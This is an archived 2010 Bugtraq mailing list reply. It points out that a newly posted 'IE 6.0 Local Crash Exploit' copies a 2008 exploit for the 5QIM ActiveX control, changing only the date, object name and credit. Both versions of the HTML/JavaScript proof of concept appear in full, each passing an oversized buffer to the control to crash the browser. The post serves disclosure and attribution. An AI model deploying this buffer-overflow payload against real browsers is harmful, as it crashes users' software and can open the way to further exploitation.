lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 23 Mar 2010 19:16:45 +0000 (GMT)
From: Veg <veg@...squirrel.org>
To: bugtraq@...urityfocus.com
Subject: Re: IE 6.0 - Local Crash Exploit

Spot the difference:

###############################################################################################
5QIM 2.0.0.9 IE Crash Exploit
2008-02-25 08:26

<object id="xiaonei" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6" 
style="display:none;">
</object>
<script>
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AAAAAAAAAA";}
object = document.getElementById("xiaonei");
object.Start5QIMWithItv('test','test',buff);
}
</script>
<pre>
<a href="javascript:;" OnClick="crash()">Crash...</a>
</pre>

###############################################################################################
and:

On Sat, 20 Mar 2010, info@...uritylab.ir wrote:

> ###############################################################################################
> # Securitylab.ir
> ###############################################################################################
> Vul:
>
> <object id="opi" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6" style="display:none;">
> </object>
> <script>
> function crash() {
> var buff = '';
> for(i=0;i<=5000;i++) {buff+="AAAAAAAAAA";}
> object = document.getElementById("opi");
> object.Start5QIMWithItv('test','test',buff);
> }
> </script>
> <pre>
> <a href="javascript:;" OnClick="crash()">.!.</a>
> </pre>
> ###############################################################################################
> # IE 6.0 Local Crash Exploit , By: Pouya Daneshmand (whh_iran@...oo.com,Pouya.Securitylab.ir)
> ###############################################################################################

Yep - the date, the object name and the attribution.

http://hi.baidu.com/flyhat/blog/item/64e6a700a59c5015728b6518.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ